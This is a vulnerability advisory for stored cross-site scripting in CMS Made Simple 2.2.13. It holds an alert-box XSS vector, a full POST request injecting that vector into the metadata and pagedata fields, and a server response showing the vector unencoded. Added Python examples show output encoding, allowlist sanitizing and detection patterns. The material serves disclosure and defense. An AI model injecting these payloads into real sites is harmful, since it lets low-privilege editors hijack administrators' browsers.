Summary:
Stored Cross-Site Scripting - CMS Made Simple 2.2.13
Detailed Description:
CMS Made Simple 2.2.13 - Cross-Site Scripting (XSS) Persistent (2 Instances)
# Summary:
• Title: CMS Made Simple 2.2.13 Cross Site Scripting (XSS) Stored (2 Instances)
• Date: 22/12/2019
• Author: Guram Javakhishvili
• Email: guramj@gmail.com, misheljava@gmail.com
• Software: CMS Made Simple 2.2.13
• Product Version: 2.2.13
• Vulnerability Type: Injection
• Vulnerability: Cross Site Scripting (XSS) Stored
# Description:
CMS Made Simple version 2.2.13 suffers from reflected and persistent (stored)
cross-site scripting and HTML injection vulnerabilities.
Insufficient validation of user input in the authenticated part of the CMS Made
Simple web application exposes the application to persistent cross-site
scripting (XSS).
These vulnerabilities allow potentially dangerous input from the user to be
accepted by the application and then embedded, without output encoding, in the
HTML response returned by the web server.
When that content is viewed, e.g. by an administrative user, the injected
JavaScript executes in that user's browser.
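The two sentences above describe the whole defect: a stored field is concatenated into the page without output encoding. As an added illustration (not code from CMS Made Simple or from the advisory author, and in Python rather than the CMS's PHP), the block below renders a head template three ways: verbatim, as observed in the advisory; entity-encoded, the fix for a field that should hold text only (Python's html.escape with quote=True is the counterpart of PHP's htmlspecialchars with ENT_QUOTES); and through an allowlist filter, the fix for a field that legitimately needs a little head markup. The template, the HeadMarkupFilter allowlist and the field names are assumptions made for the example; the sample payload is the one shown in the advisory.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample values: the advisory's "metadata" payload, and a benign
# value of the kind such a field is meant to hold. Template and names are
# assumed for illustration; this is not CMS Made Simple code.
SAMPLE_METADATA = "\"\";\"/><iframe/onload=alert('Metadata')>//"
LEGIT_METADATA = '<meta name="description" content="Front page" />'

HEAD_TEMPLATE = (
    "<head>\n<title>{title}</title>\n"
    '<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n'
    "{metadata}\n</head>"
)

# Elements and attributes a page-level head-markup field may reasonably need.
ALLOWED_TAGS = {"meta", "link"}
ALLOWED_ATTRS = {"name", "content", "http-equiv", "charset",
                 "rel", "href", "type", "media"}


def render_head_unsafe(title, metadata):
    """Observed behaviour: the stored field is concatenated into <head>
    verbatim, so any tag the editor typed becomes live markup."""
    return HEAD_TEMPLATE.format(title=title, metadata=metadata)


def render_head_escaped(title, metadata):
    """Fix for a field that should carry text only: entity-encode it,
    quotes included (PHP: htmlspecialchars with ENT_QUOTES), on output."""
    return HEAD_TEMPLATE.format(
        title=html.escape(title, quote=True),
        metadata=html.escape(metadata, quote=True),
    )


class HeadMarkupFilter(HTMLParser):
    """Allowlist filter for a field that must accept limited head markup:
    keeps <meta>/<link> with known attributes only and re-emits everything
    else as escaped text. on* handlers are never in the allowlist, and
    javascript: hrefs are rejected (coarse check; entities are already
    decoded by HTMLParser before we see the value)."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return                      # unknown element: dropped entirely
        kept = []
        for name, value in attrs:       # HTMLParser lower-cases names
            if name not in ALLOWED_ATTRS or value is None:
                continue
            if name == "href" and re.match(r"\s*javascript:", value, re.I):
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)} />")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        pass                            # only void elements are emitted

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=True))


def sanitize_head_markup(markup):
    """Rebuild the field from the allowlist; the result is safe to embed."""
    f = HeadMarkupFilter()
    f.feed(markup)
    f.close()
    return "".join(f.out)


def injected_tag_survives(rendered, tag="iframe"):
    """Self-check: is a raw <iframe start still present in the output?"""
    return f"<{tag}" in rendered.lower()


if __name__ == "__main__":
    print(render_head_unsafe("Content", SAMPLE_METADATA))
    print(render_head_escaped("Content", SAMPLE_METADATA))
    print(sanitize_head_markup(SAMPLE_METADATA))
    print(sanitize_head_markup(LEGIT_METADATA))
```

Which of the two hardened paths applies depends on what a field is designed to hold: encode a text-only field, allowlist a field that must carry a few head tags. A field whose value is executed as a template (the advisory's pagedata/Smarty field) cannot be made safe by output encoding of the value alone, so the practical control there is restricting which roles may edit it.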
# Steps to Reproduce:
The attacker needs appropriate permissions, but not Admin (the Editor or
Designer roles suffice), in order to create News, Content, Directory, Shortcuts,
etc.
The add/edit content function was found to be vulnerable to stored cross-site
scripting (XSS).
Log in as an editor > click on 'Content' > click on 'Content Manager' > Add/Edit
Content > click on 'Logic' and insert XSS payloads into the Metadata and Smarty
fields, then click Submit.
- If you click on the 'Preview' tab next to it, the XSS payload from the
Metadata field renders in the browser.
- Once the content with the XSS payload has been submitted, click on View (the
magnifying-glass icon); this opens a new tab in which the XSS payload from the
Smarty field renders.
# URL:
http://localhost/cmsms-2.2.13/admin/moduleinterface.php
List of vulnerable parameters:
• metadata
• pagedata
XSS Vector:
"";"/><iframe/onload=alert('Metadata')>//
# HTTP POST request:
POST /cmsms-2.2.13/admin/moduleinterface.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/
Content-Type: multipart/form-data; boundary=---------------------------133703138732410
Content-Length: 4193
Origin: http://localhost
Connection: close
Cookie: 6a048a268372a94a595fdec4fbda4134aa83a6e6=e5d7ffe9b2883f3ee16cbcab8b30cb7300acc36d%3A%3AeyJ1aWQiOjIsInVzZXJuYW1lIjoiZ3VyYW1qIiwiZWZmX3VpZCI6bnVsbCwiZWZmX3VzZXJuYW1lIjpudWxsLCJoYXNoIjoiJDJ5JDEwJFdaNzlUc1JiOTI2c2pLbmlndmFlcS5QdGVjRTdFdmg1S0FlNnFQNlBMbXJqSFdIQW92Lk5tIn0%3D; __c=233d48d93b73772c983; CMSIC1a82b0c9a5=4c765t5v2p4prm6t8v940s15nc; CMSSESSIDa9ac5a041c5c=ibso1e87pflpck00qt050vmoqj
Upgrade-Insecure-Requests: 1
-----------------------------133703138732410
Content-Disposition: form-data; name="mact"
CMSContentManager,m1_,admin_editcontent,0
-----------------------------133703138732410
Content-Disposition: form-data; name="__c"
233d48d93b73772c983
-----------------------------133703138732410
Content-Disposition: form-data; name="m1_content_id"
5
-----------------------------133703138732410
Content-Disposition: form-data; name="m1_active_tab"
-----------------------------133703138732410
Content-Disposition: form-data; name="m1_content_type"
content
-----------------------------133703138732410
Content-Disposition: form-data; name="title"
Content
-----------------------------133703138732410
Content-Disposition: form-data; name="content_en"
<p>test</p>
-----------------------------133703138732410
Content-Disposition: form-data; name="menutext"
Content
-----------------------------133703138732410
Content-Disposition: form-data; name="parent_id"
2
-----------------------------133703138732410
Content-Disposition: form-data; name="showinmenu"
0
-----------------------------133703138732410
Content-Disposition: form-data; name="showinmenu"
1
-----------------------------133703138732410
Content-Disposition: form-data; name="titleattribute"
test
-----------------------------133703138732410
Content-Disposition: form-data; name="accesskey"
-----------------------------133703138732410
Content-Disposition: form-data; name="tabindex"
-----------------------------133703138732410
Content-Disposition: form-data; name="target"
---
-----------------------------133703138732410
Content-Disposition: form-data; name="metadata"
"";"/><iframe/onload=alert('Metadata')>//
-----------------------------133703138732410
Content-Disposition: form-data; name="pagedata"
"";"/><iframe/onload=alert('Smarty')>//
-----------------------------133703138732410
Content-Disposition: form-data; name="design_id"
5
-----------------------------133703138732410
Content-Disposition: form-data; name="template_id"
5
-----------------------------133703138732410
Content-Disposition: form-data; name="alias"
error404
-----------------------------133703138732410
Content-Disposition: form-data; name="active"
0
-----------------------------133703138732410
Content-Disposition: form-data; name="active"
1
-----------------------------133703138732410
Content-Disposition: form-data; name="secure"
0
-----------------------------133703138732410
Content-Disposition: form-data; name="cachable"
0
-----------------------------133703138732410
Content-Disposition: form-data; name="cachable"
1
-----------------------------133703138732410
Content-Disposition: form-data; name="image"
\logo1.gif
-----------------------------133703138732410
Content-Disposition: form-data; name="thumbnail"
\thumb_logo1.gif
-----------------------------133703138732410
Content-Disposition: form-data; name="extra1"
-----------------------------133703138732410
Content-Disposition: form-data; name="extra2"
-----------------------------133703138732410
Content-Disposition: form-data; name="extra3"
-----------------------------133703138732410
Content-Disposition: form-data; name="wantschildren"
0
-----------------------------133703138732410
Content-Disposition: form-data; name="wantschildren"
1
-----------------------------133703138732410
Content-Disposition: form-data; name="searchable"
0
-----------------------------133703138732410
Content-Disposition: form-data; name="searchable"
1
-----------------------------133703138732410
Content-Disposition: form-data; name="disable_wysiwyg"
0
-----------------------------133703138732410
Content-Disposition: form-data; name="ownerid"
1
-----------------------------133703138732410
Content-Disposition: form-data; name="additional_editors"
-----------------------------133703138732410
Content-Disposition: form-data; name="additional_editors[]"
2
-----------------------------133703138732410
Content-Disposition: form-data; name="m1_submit"
Submit
-----------------------------133703138732410--
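The request above is what someone reviewing web-server or WAF logs for this issue would need to recognise: a multipart edit-content submission whose metadata and pagedata parts carry markup. As an added example (not code from the advisory or from CMS Made Simple), the Python block below parses such a body into its fields and applies a coarse triage check: any tag in a field that should be plain text is flagged, while the WYSIWYG body field, which legitimately contains HTML such as the `<p>test</p>` seen above, is flagged only for active content. The sample body is constructed from the field names and values shown in the request; the HTML_FIELDS allowlist and the detection patterns are assumptions made for the example.

```python
import re

# Boundary as declared in the advisory's Content-Type header.
BOUNDARY = "---------------------------133703138732410"

# Constructed sample body: a trimmed copy of the advisory's request, keeping
# the field names and values shown there (CRLF line endings as on the wire).
SAMPLE_BODY = "\r\n".join([
    f"--{BOUNDARY}",
    'Content-Disposition: form-data; name="mact"', "",
    "CMSContentManager,m1_,admin_editcontent,0",
    f"--{BOUNDARY}",
    'Content-Disposition: form-data; name="title"', "",
    "Content",
    f"--{BOUNDARY}",
    'Content-Disposition: form-data; name="content_en"', "",
    "<p>test</p>",
    f"--{BOUNDARY}",
    'Content-Disposition: form-data; name="metadata"', "",
    "\"\";\"/><iframe/onload=alert('Metadata')>//",
    f"--{BOUNDARY}",
    'Content-Disposition: form-data; name="pagedata"', "",
    "\"\";\"/><iframe/onload=alert('Smarty')>//",
    f"--{BOUNDARY}",
    'Content-Disposition: form-data; name="m1_submit"', "",
    "Submit",
    f"--{BOUNDARY}--", "",
])

# Fields whose purpose is to carry HTML (the WYSIWYG page body). They are
# checked only for active content, so an ordinary <p> does not raise an alert.
# This set is an assumption for the example.
HTML_FIELDS = {"content_en"}

ACTIVE_CONTENT = re.compile(
    r"<\s*/?\s*(script|iframe|object|embed|svg)\b"  # scriptable elements
    r"|\bon[a-z]+\s*=",                             # inline event handlers
    re.I,
)
ANY_TAG = re.compile(r"<\s*/?[a-z!]", re.I)


def boundary_from_content_type(value):
    """Pull the boundary out of a multipart/form-data Content-Type value."""
    m = re.search(r'boundary=("?)([^";]+)\1', value)
    return m.group(2) if m else None


def parse_multipart(body, boundary):
    """Minimal multipart/form-data parser returning {field name: value}.
    Text parts only; file parts (filename=...) would need separate handling."""
    fields = {}
    for chunk in body.split(f"--{boundary}")[1:]:
        if chunk.startswith("--"):
            break                                   # closing delimiter
        if chunk.startswith("\r\n"):
            chunk = chunk[2:]
        head, _, value = chunk.partition("\r\n\r\n")
        m = re.search(r';\s*name="([^"]*)"', head)  # not filename="..."
        if not m:
            continue
        if value.endswith("\r\n"):                  # CRLF belongs to delimiter
            value = value[:-2]
        fields[m.group(1)] = value
    return fields


def flag_suspicious_fields(fields):
    """Names of fields carrying markup where none belongs, or active content
    in a field that legitimately holds HTML. Coarse by design: a triage
    signal for log review or a WAF rule, not a sanitizer."""
    flagged = []
    for name, value in fields.items():
        if name in HTML_FIELDS:
            if ACTIVE_CONTENT.search(value):
                flagged.append(name)
        elif ANY_TAG.search(value):
            flagged.append(name)
    return flagged


if __name__ == "__main__":
    parsed = parse_multipart(SAMPLE_BODY, BOUNDARY)
    for name in flag_suspicious_fields(parsed):
        print(f"suspicious field {name!r}: {parsed[name]!r}")
```

Run against the sample body, the check reports metadata and pagedata and stays quiet on content_en. In practice this runs over captured request bodies (full-request logging or a WAF), since ordinary access logs do not record POST bodies; in a CMS the same check belongs server-side too, alongside the output encoding, not instead of it.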
# Snippet of HTTP server response (output not encoded):
HTTP/1.1 200 OK
Date: Sat, 21 Dec 2019 19:01:47 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1c PHP/7.3.7
X-Powered-By: PHP/7.3.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11148
"";"/><iframe/onload=alert('Smarty')>//<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>guram - Content</title>
<base href="http://localhost/cmsms-2.2.13/" />
<meta name="Generator" content="CMS Made Simple - Copyright (C) 2004-2019. All rights reserved." />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
"";"/><iframe/onload=alert('Metadata')>//
<link rel="stylesheet" type="text/css" href="http://localhost/cmsms-2.2.13/tmp/cache/stylesheet_combined_fc62991346a03890a7c4a79a94d4e411.css" media="screen" />